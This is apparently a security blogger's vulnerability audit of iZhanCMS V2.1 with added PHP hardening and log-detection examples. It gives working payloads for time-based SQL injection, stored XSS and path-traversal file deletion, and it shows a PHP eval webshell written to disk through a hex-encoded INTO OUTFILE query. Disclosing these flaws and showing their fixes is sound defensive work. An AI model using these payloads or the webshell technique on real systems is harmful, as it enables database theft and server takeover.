iZhanCMS (爱站CMS, "love station CMS") is a free, open-source content management system that describes itself as open and flexible, safe and efficient, simple and beautiful. This time we audited the code of iZhanCMS V2.1 and found the security vulnerabilities described below.
Official website of izhancms: http://www.izhancms.com
Source code version: iZhanCMS (Zend 6.0) v2.1
Source code download: http://www.izhancms.com/category/category/index/cid/1
Default admin panel address: http://127.0.0.1/admin/admin/index
Default account: admin; the password is set by the installer (at least six characters)
Code analysis:
Vulnerability file location: application/index/Controllers/indexcontroller.php, lines 89-102:
The id parameter obtained in this function is not wrapped in single quotes; it is concatenated into the SQL statement and passed to the database for execution. The result is a SQL injection vulnerability in the program, which an attacker can use to obtain sensitive information from the database.
Exploit:
Based on the vulnerable location, a time-based blind injection payload is constructed:
http://127.0.0.1/index/index/qrcodepreview?id=2/**/xor/**/if(substring(user(),1,1)='2',sleep(5),0)--
Database data can also be obtained directly with sqlmap:
Code analysis:
Vulnerability file location: application/goods/Controllers/goodscontroller.php, lines 68-96
In this function, the obtained id parameter is passed to the getlinkgoodsid function for querying. Note the third circled location, where the id parameter is concatenated into the SQL statement and passed to the database for execution; SQL injection exists here. Let's follow up the getlinkgoodsid function:
Vulnerability file location: application/goods/Models/goodsmodel.php, lines 91-109:
The id parameter obtained in this function is likewise concatenated into the SQL statement and passed to the database for execution.
To sum up, the id parameter is concatenated into two SQL statements, which leads to a SQL injection vulnerability in the program. An attacker can use it to obtain sensitive information from the database.
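The unquoted id concatenation found in the index controller and in the goods controller / getlinkgoodsid, shown next to a hardened version. This is an added example, not iZhanCMS code; the table and column names are assumptions.

```php
<?php
// Added example, not iZhanCMS code: the id-concatenation pattern found in the
// index and goods controllers (and getlinkgoodsid), beside a hardened version.
// Table and column names are assumptions.

// Vulnerable shape: $id lands in the SQL text unquoted, so anything after the
// digits becomes part of the statement.
function buildUnsafeQuery(string $id): string
{
    return "SELECT * FROM goods WHERE id=" . $id;
}

// Hardened shape, step 1: accept only a positive integer at the boundary.
// filter_var rejects the whole value if any non-integer characters are present.
function validateId($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Hardened shape, step 2: bind the value instead of splicing it, so the SQL
// text is constant. Execute with PDO: $pdo->prepare($sql)->execute($params).
function buildSafeQuery(int $id): array
{
    return ['SELECT * FROM goods WHERE id = :id', [':id' => $id]];
}

// Constructed inputs: a normal id and the two payload shapes from this audit.
$inputs = [
    '2',
    "2/**/xor/**/if(substring(user(),1,1)='2',sleep(5),0)--",
    "2 xor if('2'='2',sleep(5),0)--",
];

foreach ($inputs as $raw) {
    echo "input:  $raw\n";
    echo "unsafe: ", buildUnsafeQuery($raw), "\n";
    $id = validateId($raw);
    if ($id === null) {
        echo "safe:   rejected, not an integer id\n\n";
        continue;
    }
    [$sql, $params] = buildSafeQuery($id);
    echo "safe:   $sql with ", json_encode($params), "\n\n";
}
```

Validation belongs at the controller boundary, but the model (getlinkgoodsid) should still bind the value rather than trusting its caller.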
Exploit:
Based on the vulnerable location, a time-based blind injection payload is constructed:
http://127.0.0.1/goods/Goods/info?id=2 xor if('2'='2',sleep(5),0)--
It can also be run directly with sqlmap:
The code here is too simple, so code analysis is skipped.
Exploit:
Front end - Comments and Suggestions - Commenter field - submit the payload: 222<script>alert(/XSS/)</script>
When the administrator views the message in the admin panel, the JS code is executed.
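The fix for the stored XSS above is to escape the comment fields at the point where the admin page renders them. This is an added example, not iZhanCMS code; the row markup is hypothetical.

```php
<?php
// Added example, not iZhanCMS code: escape stored comment fields when the
// admin page renders them, so a stored payload is displayed as text.

function escapeForHtml(string $value): string
{
    // ENT_QUOTES also encodes single quotes, so the value is safe inside
    // attributes; ENT_SUBSTITUTE avoids an empty result on malformed UTF-8.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Renders one row of the admin "comments and suggestions" list (hypothetical markup).
function renderCommentRow(array $comment): string
{
    return '<tr><td>' . escapeForHtml($comment['commenter']) . '</td>'
         . '<td>' . escapeForHtml($comment['content']) . '</td></tr>';
}

// Constructed records: the payload from this audit and an ordinary commenter
// whose "&" and "'" must survive as a single encoding, not a double one.
$rows = [
    ['commenter' => '222<script>alert(/XSS/)</script>', 'content' => 'hello'],
    ['commenter' => "O'Brien & Sons", 'content' => 'A <b>normal</b> message'],
];
foreach ($rows as $row) {
    echo renderCommentRow($row), "\n";
}
```

Escaping at output is the right layer; encoding on input (as the SQL console later in this write-up does) leaves every other sink unprotected.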
Code analysis:
Vulnerability file location 1: admin/application/extensions/Controllers/qrcodecontroller.php, lines 235-246:
The id parameter obtained in this function is concatenated into the SQL statement and passed to the database for execution; SQL injection exists here.
Vulnerability file location 2: admin/application/webset/Controllers/managerlogcontroller.php, lines 33-57:
Vulnerability file location 3: admin/application/webset/Controllers/adminusercontroller.php, lines 37-69:
In this function, the obtained keyword parameter is also concatenated into the SQL statement without any filtering and passed to the database for execution, resulting in a SQL injection vulnerability in the program, which an attacker can use to obtain sensitive information from the database.
Basically all search boxes in the admin panel have the same problem.
Exploit:
Vulnerability location 1: http://127.0.0.1/admin/extensions/qrcode/preview?id=2
It can be run directly with sqlmap:
Location 2: log in to the admin panel - System Settings - Log Management - Search - Keyword
Location 3: log in to the admin panel - Permission Settings - System Administrator - Search - Keyword
The admin panel search boxes have almost identical problems, so they are not verified one by one.
Code analysis:
Vulnerability file location: admin/application/webset/Controllers/dbrecovercontroller.php
Follow up the deletetable function:
Vulnerability file location: admin/application/webset/Models/tablemodel.php
This function obtains $save_path, processes it, and then passes $file_path directly to the delete function for execution. This leads to an arbitrary file deletion vulnerability in the program, which an attacker can use to delete arbitrary files.
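A safe version of the deletetable path handling described above: allowlist the name and confine the resolved path to the backup directory before calling unlink. This is an added example, not iZhanCMS code; the ".sql" suffix and directory layout are assumptions.

```php
<?php
// Added example, not iZhanCMS code: the deletetable path handling derives a
// file path from a request value and deletes it. This version allowlists the
// name and confines the resolved path to the backup directory.
// The ".sql" suffix and directory layout are assumptions.

function resolveBackupFile(string $baseDir, string $tbname): ?string
{
    // Syntactic allowlist: a table backup name is letters, digits or underscore.
    if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $tbname)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves ".." and symlinks; the result must still sit below $base.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $tbname . '.sql');
    if ($candidate === false
        || strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

function deleteBackup(string $baseDir, string $tbname): bool
{
    $path = resolveBackupFile($baseDir, $tbname);
    if ($path === null) {
        error_log("rejected backup delete request: " . $tbname);
        return false;
    }
    return unlink($path);
}

// Demo in a temporary directory: one constructed backup inside it, and one
// constructed file next to it that a traversal name must not be able to reach.
$dir = sys_get_temp_dir() . '/backups_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents("$dir/users.sql", '-- constructed backup');
$outside = "$dir.txt";
file_put_contents($outside, 'must survive');

var_dump(deleteBackup($dir, 'users'));               // a legitimate backup name
var_dump(deleteBackup($dir, '../../../test.txt'));   // the traversal name from this audit
var_dump(file_exists($outside));                     // the sibling file is untouched

unlink($outside);
rmdir($dir);
```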
Exploit:
Create test.txt in the website root directory as the test file.
Log in to the admin panel and submit the payload; test.txt in the root directory is deleted.
Payload: http://127.0.0.1/admin/webset/dbrecover/delete?tbname=../../../test.txt
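For detection, the request shapes used in this write-up (the time-based and xor injection on the qrcode preview and goods endpoints, sqlmap's User-Agent, and the traversal name sent to the dbrecover delete action) can be flagged in web server access logs. This is an added example, not part of the original audit; the log lines and the sqlmap version string are constructed.

```php
<?php
// Added example, not from the audit: tag access-log requests that match the
// payload shapes shown in this write-up. Log lines below are constructed.

// Combined Log Format: ip ident user [time] "METHOD path HTTP/x" status size "ref" "ua"
const LOG_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"/';

function classifyRequest(string $line): ?array
{
    if (!preg_match(LOG_RE, $line, $m)) {
        return null;                       // not a parseable log line
    }
    [, $ip, $time, $method, $rawPath, $status, $ua] = $m;
    $path = urldecode($rawPath);           // payloads arrive URL-encoded
    $q = strpos($path, '?');
    $query = $q === false ? '' : substr($path, $q + 1);
    $tags = [];
    if (preg_match('/\b(sleep|benchmark)\s*\(/i', $query)) {
        $tags[] = 'time-based sqli';
    }
    if (preg_match('/\bxor\b|\/\*\*\/|--\s*$/i', $query)) {
        $tags[] = 'sqli obfuscation';
    }
    if (stripos($ua, 'sqlmap') !== false) {
        $tags[] = 'sqlmap user-agent';
    }
    if (preg_match('/(^|&)tbname=[^&]*\.\.[\/\\\\]/', $query)) {
        $tags[] = 'path traversal';
    }
    return $tags ? ['ip' => $ip, 'time' => $time, 'path' => $path, 'tags' => $tags] : [];
}

// Constructed lines: one benign request, then the three request shapes from this audit.
$lines = [
    '10.0.0.5 - - [10/Oct/2020:12:00:01 +0800] "GET /index/index/qrcodepreview?id=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2020:12:00:07 +0800] "GET /index/index/qrcodepreview?id=2/**/xor/**/if(substring(user(),1,1)=%272%27,sleep(5),0)-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2020:12:00:09 +0800] "GET /goods/Goods/info?id=2%20xor%20if(%272%27=%272%27,sleep(5),0)-- HTTP/1.1" 200 9 "-" "sqlmap/1.4"',
    '10.0.0.9 - - [10/Oct/2020:12:03:40 +0800] "GET /admin/webset/dbrecover/delete?tbname=../../../test.txt HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
];
foreach ($lines as $line) {
    $r = classifyRequest($line);
    if ($r) {
        printf("%s %s %s\n", $r['time'], $r['ip'], implode(', ', $r['tags']));
    }
}
```

Pattern matching catches the shapes shown here; a blind probe that avoids these keywords is better caught by comparing response times per parameter value.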
Method 1: modify the tag library file
Log in to the admin panel - Template Management - Tag Management - Tag List - modify tag.lib.php:
Payload: phpinfo();
Visit http://127.0.0.1/library/mainone/taglib/tags.lib.php to trigger the code execution vulnerability.
Method 2: write a webshell with a SQL statement
Log in to the admin panel - System Settings - Database Operation - SQL Statement - Execute SQL statement.
Problem: the input characters are HTML-entity encoded, so the traditional INTO OUTFILE statement cannot write the file successfully:
select '<?php eval($_POST[cmd]);?>' into outfile 'C:/www/222aaa.php' (write failed)
Convert the one-liner to hex and construct the payload as follows:
SELECT 111222 INTO OUTFILE 'E:/study/WWW/iZhanCMS/2222.php' LINES
TERMINATED BY 0x3C3F70687020406576616C28245F504F53545B2761275D293B3F3E --
The webshell is written successfully and the web server can be controlled.
This is a case combining black-box and white-box testing, which is relatively comprehensive. Those who research this area are welcome to discuss and exchange ideas.
Bypass
About Me
A network security enthusiast with a paranoid pursuit of technology, committed to sharing original, high-quality practical content, including but not limited to penetration testing, WAF bypass, code auditing, and security operations and maintenance.